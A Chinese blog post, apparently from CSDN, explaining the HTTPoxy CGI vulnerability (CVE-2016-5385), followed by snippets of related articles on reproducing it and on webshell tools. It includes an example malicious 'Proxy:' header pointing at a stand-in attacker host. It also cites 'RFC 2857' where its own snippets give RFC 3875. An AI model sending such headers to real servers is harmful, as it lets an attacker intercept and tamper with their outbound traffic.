HTTPoxy

最新推荐文章于 2022-08-13 19:38:48 发布
翻译 最新推荐文章于 2022-08-13 19:38:48 发布 · 568 阅读 · 0
文章标签:

#HTTPoxy

这篇讲得非常亲切:
https://nakedsecurity.sophos.com/2016/07/19/httpoxy-the-disease-that-could-make-your-web-server-spring-a-leak/
这个是专门给HTTPoxy这个漏洞的网站:
https://httpoxy.org/
这个来自Laruence的博客:
http://www.laruence.com/2016/07/19/3101.html
来自360播报的分析:
http://bobao.360.cn/learning/detail/2903.html
A PoC for exploiting Guzzle’s HTTP_PROXY untrusted read
https://github.com/httpoxy/php-fpm-httpoxy-poc
HTTPoxy - CGI “HTTP_PROXY” variable name clash
https://access.redhat.com/security/vulnerabilities/httpoxy

HTTPoxy介绍

这个bug跟HTTP请求有关,还有跟代理(proxy)设置有关。
要弄清楚HTTPoxy,首先得弄清楚一个概念CGI(Common Gateway Interface)。比如PHP, Perl, Go, Python等。
Web请求,通常包含一些HTTP头,这些HTTP一方面会告诉服务器自己的相关信息,另一方面也会影响HTTP响应的结果。

从Web服务器到CGI脚本(比如PHP脚本)通过都是通过环境变量的方式来处理这些HTTP头的,不管是 Unix (e.g. the BSDs and OS X), Linux还是Windows。
其实就是一些以NAME=VALUE的方式存储在内存中的文本字符串,以便进程可以方便的访问它们。不管你打开Windows的cmd还是Linux/macOS的terminal,你都可以通过set命令查看当前terminal的环境变量。

RFC 2857提到说,为了更好地支持CGI子进程,那些支持CGI脚本的Web服务器应该将HTTP头的每个字段都添加到环境变量中,以使得原始HTTP头的每个字段都可以让CGI脚本访问。当然,为了避免冲突,CGI不能把每个HTTP头中的字段以同样的名字都添加到环境变量中。否则,如果有一个HTTP头叫Path:的话,会覆盖掉叫做PATH=的标准环境变量。这样会非常不安全,因为PATH=定义了去哪里找那些启动的程序。比如,可以构造一个Path: C:\Users\caiqiqi\Downloads的HTTP请求头字段,这样就欺骗CGI程序使它从一个非官方的地方读取程序。这样可能会造成RCE(Remote Code Execution)。

避免冲突

于是RFC 2857想到一个办法,
如果请求是HTTP协议的话,首先将HTTP请求头的每个字段的名字变成全大写,再在每个HTTP请求头的字符串前面加上一个HTTP_,来作为供CGI子进程处理的环境变量。并且,把HTTP请求头中的-替换成_。比如Content-Type,变成环境变量就是HTTP_CONTENT_TYPE。再比如HTTP头中Path:的字段就会变成HTTP_PATH=C:\Users\caiqiqi\Downloads
//TODO

So far, so good…

但是并不是所有的以HTTP_开头的环境变量本质上都是安全的。
比如很多Web友好的程序/工具(很可能会被CGI脚本调用)会把这样一个环境变量HTTP_PROXY=特殊看待,它们会用这个变量来设置自己的代理。换句话说,如果我构造这样一个HTTP请求头

Proxy: http://caiqiqi.example/crooked_proxy

处理这个请求的CGI脚本就会设置这样一个环境变量

HTTP_PROXY=http://caiqiqi.example/crooked_proxy

于是,在此之后的这些CGI脚本产生的向外的HTTP请求(比如数据库查询或者认证一个用户),都不会被直接处理,而是会先发到caiqiqi.example这个主机上(作为HTTP请求的proxy),都是因为之前的毫不知情的代理设置。

注意:其实wget和curl使用的都是小写的http_proxy,不会被这个影响到。 最开心的是wget/curl不受影响!

这可能会导致大规模的数据泄露。
//TODO

Vulhub靶场CGI HTTPoxy漏洞复现(CVE-2016-5385)
X_python321的博客
07-26 434
免责声明:本文仅用于技术交流和知识分享目的。漏洞复现涉及到系统和网络的安全性测试,可能导致系统崩溃、数据丢失或其他问题。读者在尝试漏洞复现之前必须获得合法授权,并自行承担一切风险和责任。
HTTPoxy CGI应用程序漏洞(CVE-2016-5385)
willow_liang的博客
04-15 1592
CGI简介 CGI(Common Gateway Interface)公共网关接口,是外部扩展应用程序与 Web 服务器交互的一个标准接口。服务器端与客户端进行交互的常见方式多,CGI 技术就是其中之一。根据CGI标准,编写外部扩展应用程序,可以对客户端浏览器输入的数据进行处理,完成客户端与服务器的交互操作。CGI规范定义了Web服务器如何向扩展应用程序发送消息,在收到扩展应用程序的信息后又如何进行处理等内容。对于许多静态的HTML网页无法实现的功能,通过 CGI可以实现,比如表单的处理、对数据库的访问、
HTTPoxy漏洞(CVE-2016-5385)
EC_Carrot的博客
07-01 497
漏洞背景 PHP 7.0.8及之前的版本中存在安全漏洞,该漏洞源于程序没有解决RFC 3875模式下的命名空间冲突。程序没有正确处理来自HTTP_PROXY环境变量中不可信客户端数据应用程序。远程攻击者借助HTTP请求中特制的Proxy header消息利用该漏洞实施中间人攻击,指引服务器发送连接到任意主机。 漏洞复现 我直接弃坑,但是有几位师傅写的都很不错: https://blog.youkuaiyun.com/JiangBuLiu/article/details/95218436 https://blog.cs
HTTPOXY 漏洞
weixin_45593546的博客
07-02 295
长久一来我们习惯了使用一个名为"http_proxy"的环境变量来设置我们的请求代理。 http_proxy=127.0.0.1:9999 wget http://www.laruence.com/ 在CGI(RFC 3875)的模式的时候, 会把请求中的Header, 加上HTTP_ 前缀, 注册为环境变量, 所以如果在Header中发送一个Proxy:xxxxxx, 那么 PHP 就会把他注册为HTTP_PROXY环境变量, 于是getenv(“HTTP_PROXY”)就变成可被控制的了. 那么如果所
httpoxy漏洞远程攻击PHP Python应用
weixin_33924220的博客
09-01 279
httpoxy漏洞是一个刚暴露出来的漏洞,它针对 PHP、Go、Python 等语言的 CGI 应用的漏洞。它将apache等组件中用于代理HTTP访问的字段名变换为“HTTP_PROXY”,再传递给对应的CGI来执行。如果CGI或者脚本中对外请求的组件依赖于“HTTP_PROXY”这个环境变量,那就中招了,会导致远程攻击。 HTTP_Proxy...
HTTPOXY漏洞说明
terry198608的博客
03-17 432
这里有一个核心的背景是, 长久一来我们习惯了使用一个名为”http_proxy”的环境变量来设置我们的请求代理, 比如在命令行我们经常这么用: http_proxy=127.0.0.1:9999 wget http://www.laruence.com/ 通过设置一个http_proxy的环境变量, 让wget使用代理请求http://www.laruence.com/ 有据可考的是, 这样
利用Vulnhub复现漏洞 - HTTPoxy漏洞(CVE-2016-5385)
JiangBuLiu的博客
07-09 2456
HTTPoxy漏洞(CVE-2016-5385)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发出请求 Vulnhub官方复现教程 https://vulhub.org/#/environments/cgi/httpoxy/ 漏洞原理 参考:http://www.laruence.com/2016/07/19/3101.html 简单来说,根据RF...
远程代理漏洞:httpoxy
张嘉嘉
07-22 2005
今天看了一篇新闻如是说:PHP 、Python 等网站应用远程代理漏洞:httpoxy 于是怀着好奇心去搜了一下.具体内容大概如下: 首先 : 这里有一个核心的背景是, 我们习惯了使用一个名为”http_proxy”的环境变量来设置我们的请求代理,比如: http_proxy=127.0.0.1:9999 wget http://www.laruence.com/ 说明 :通过设置一
PHP反序列化漏洞【三】
weixin_39664643的博客
05-11 1170
PHP反序列化漏洞【三】 来学习下 phar反序列化漏洞,拓展php反序列化漏洞的攻击面 特定PHP版本下__wakeup()魔术方法绕过漏洞(CVE-2016-7124) phar反序列化漏洞 通常我们在利用反序列化漏洞的时候,只能将序列化后的字符串传入unserialize(),随着代码安全性越来越高,利用难度也越来越大 在2018 Black Hat大会上,安全研究员Sam Thomas分享了议题 It’s a PHP unserialization vulnerability Jim, but
httpoxy漏洞(CVE-2016-5385)
温和的跳跃
07-30 1239
在 CGI(RFC 3875) 的模式的时候,会把请求中的 Header,加上HTTP_前缀,注册为环境变量,所以如果你在 Header 中发送一个Proxy:xxxxxx,那么 PHP 就会把他注册为http_proxy环境变量 就是说 你写的proxy会成为人家服务器的http_proxy环境变量,人家服务器以后想通过代理请求点什么,你都会知道。都会被代理到攻击者想要的地址,之后攻击者就可以伪造,监听,篡改你的请求了… 这是目前发现的最好玩的漏洞了 简单又好玩 参考链接 ...
【vulhub】httpoxy漏洞(CVE-2016-5385)
qq_45300786的博客
09-13 1201
这个httpoxy漏洞,简单来说,就是可以截获用户http请求包,从而获取到一些敏感信息。 httpoxy简单理解 https://blog.youkuaiyun.com/zuoside__lord/article/details/107696503 NC监听 https://blog.youkuaiyun.com/qq_34640691/article/details/115740809?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRL
HTTPOXY漏洞下的思考
程序老兵的博客
07-19 944
晚晚刷微博看到最新爆出的httpoxy远程代理感染漏洞的介绍 今天中午看到鸟哥(风雪之隅)博客更新了:http://www.laruence.com/2016/07/19/3101.html 摘录重点: 在CGI(RFC 3875)的模式的时候, 会把请求中的Header, 加上HTTP_ 前缀, 注册为环境变量, 所以如果你在Header中发送一个Proxy:xxxxxx, 那么P
HTTPOXY -- CGI 环境变量劫持漏洞分析
weixin_33982670的博客
07-19 372
0x00 前言 昨晚,一个名为 HTTPOXY 的漏洞在安全圈内广泛传播。云盾攻防对抗团队第一时间对此漏洞进行了深入分析,发现其本质是一个 CGI 环境变量劫持漏洞,对 CGI 的环境变量HTTP_PROXY 变量进行劫持。如果 CGI 在运行过程中依赖 HTTP_PROXY,那么攻击者将能够获取到程序敏感数据,甚至伪造返回包对 CGI...
【转】HTTPOXY漏洞说明
weixin_30364147的博客
07-19 109
作者: Laruence( ) 本文地址: http://www.laruence.com/2016/07/19/3101.html 转载请注明出处 好久没写文章了, 博客都长草了, 早上起来本来想去上班, 一看这么大雨, 这要上路了不得堵死啊. 再加上有同学对我昨天转发的微博HTTPOXY漏洞表示不理解, 问会不会影响普通应用, 于是就写篇文章介绍下, 等早高峰过了吧...
Vulhub漏洞系列:HTTPoxy漏洞(CVE-2016-5385)
weixin_43072923的博客
05-19 2879
Vulhub漏洞系列:HTTPoxy漏洞(CVE-2016-5385)00.前言:01.HTTPoxy简介02.漏洞描述03.漏洞复现 00.前言: 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.HTTPoxy简介   httpoxy是一个CGI应用环境的远程利用漏洞,影响一系列以PHP为主要代表的Web动态语言和Apache、Nginx等Web服务器。 02.漏洞描述   根据RFC 3875规定,CGI(fastcgi)要将用户传入的所
小说httpoxy
weixin_33874713的博客
09-02 137
前段时间爆出了httpoxy漏洞,从爆出到现在也有两个礼拜了,然而还是有许多人肯定心中还是会有疑问——httpoxy漏洞到底是什么。这里就让我们来一起看一下httpoxy漏洞到底是什么漏洞,它的成因及影响。首先,我们要知道什么是httpoxy漏洞。什么是httpoxy漏洞:具体来说, httpoxy是一组影响运行在CGI 或者类似CGI环境的漏洞集。http_poxy漏洞的...
httpoxy漏洞检测与处理
Enweitech Software Works
08-19 1462
昨天凌晨爆出的Httpoxy漏洞,是一个针对在CGI(RFC 3875)或类似CGI上运行程序的漏洞,它可以将请求中的Header,加上HTTP_前缀,注册为环境变量来使用,Header中的Proxy字段的内容直接变成程序的“HTTP_PROXY”环境变量。(“HTTP_PROXY”是一个配置代理是常见的环境变量。)从而导致HTTP_PROXY被污染。 漏洞测试 1. Apache环境
openssl 版本区别_冰蝎的前世今生:3.0新版本下的一些防护思考
weixin_39641103的博客
11-27 1055
冰蝎(Behinder)是国内黑客圈较火的一款Webshell管理工具。在今年HW开始前,冰蝎突然进行了3.0版本的发布,新版本修改了不少旧版本的流量特征,导致大量WAF、HIDS、Webshell检测工具失效。本文将详细揭秘冰蝎的前世今生,以及对于冰蝎相关攻击的检测思路和3.0新版本下的防护思考。冰蝎的前世在冰蝎这个工具出现以前,中国菜刀一直是国内的白帽子、黑帽子、各种帽子常用的Webshell...
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
lza20001103的博客
08-13 5769
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
Flarum 0.1.0 beta7:新一代论坛软件的更新与安全
最新版本的Flarum 0.1.0 beta7在2017年5月23日更新,其中包括解决了一个名为HTTPoxy的安全漏洞的问题。该漏洞可能被恶意利用从而对使用Flarum的服务器造成影响。更新内容还包括阻止对Apache配置文件(composer文件)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值